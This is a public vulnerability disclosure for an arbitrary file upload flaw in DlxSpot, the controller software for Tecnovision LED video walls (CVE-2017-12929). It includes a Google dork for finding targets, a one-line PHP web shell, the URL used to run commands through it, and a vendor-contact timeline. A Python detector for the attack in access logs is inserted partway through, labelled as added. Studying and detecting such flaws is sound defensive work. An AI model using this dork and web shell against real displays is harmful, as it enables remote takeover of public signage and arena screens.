# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Author's Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED video walls
#        all over the world; they are used in football arenas, concert halls,
#        shopping malls, as road signs, etc.
# CVE: CVE-2017-12929
# Linked CVEs: CVE-2017-12928, CVE-2017-12930.

# Visit my github page at
# https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
# for complete takeover of the box, from SQLi to root access.

###############################################################################################################################

Arbitrary File Upload leading to Remote Command Execution:

1. Visit http://host/resource.php and upload a PHP shell. For example:
   <?php system($_GET["c"]); ?>

2. RCE via http://host/resource/source/shell.php?c=id

3. Output: www-data
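As an added defensive example (not part of the advisory), a small Python script that scans Apache-style access log lines for the sequence the steps above describe: a POST to /resource.php followed by a request for a script file under /resource/source/. The log lines and IP addresses are constructed for the example; the upload directory is taken from the advisory's step 2 URL.

```python
import re

# Constructed sample log lines in Apache combined format (not from a real device).
SAMPLE_LOG = """\
10.0.0.5 - - [14/May/2017:10:01:02 +0000] "GET /resource.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [14/May/2017:10:01:09 +0000] "POST /resource.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [14/May/2017:10:01:15 +0000] "GET /resource/source/shell.php?c=id HTTP/1.1" 200 31 "-" "Mozilla/5.0"
10.0.0.7 - - [14/May/2017:10:02:00 +0000] "POST /resource.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [14/May/2017:10:02:05 +0000] "GET /resource/source/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_ENDPOINT = "/resource.php"      # upload form from the advisory
UPLOAD_DIR = "/resource/source/"       # where uploads land, per step 2 of the advisory
# Anything the PHP handler would execute; the extension check ignores a trailing query string.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)(\?|$)', re.IGNORECASE)


def parse_line(line):
    """Return the parsed fields of one access log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_to_exec(log_text):
    """Flag requests for script files under the upload directory.

    Returns a list of (ip, path, uploaded_first) tuples; uploaded_first is True
    when the same client POSTed to the upload endpoint earlier in the log.
    """
    uploaders = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bare_path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and bare_path == UPLOAD_ENDPOINT:
            uploaders.add(rec["ip"])
        elif bare_path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(rec["path"]):
            hits.append((rec["ip"], rec["path"], rec["ip"] in uploaders))
    return hits


if __name__ == "__main__":
    for ip, path, chained in find_upload_to_exec(SAMPLE_LOG):
        print(f"{ip} requested {path} (preceded by upload: {chained})")
```

Serving the upload directory with script execution disabled (or storing uploads outside the web root) removes the condition this rule detects.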

TIMELINE:

2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVEs assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.

DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN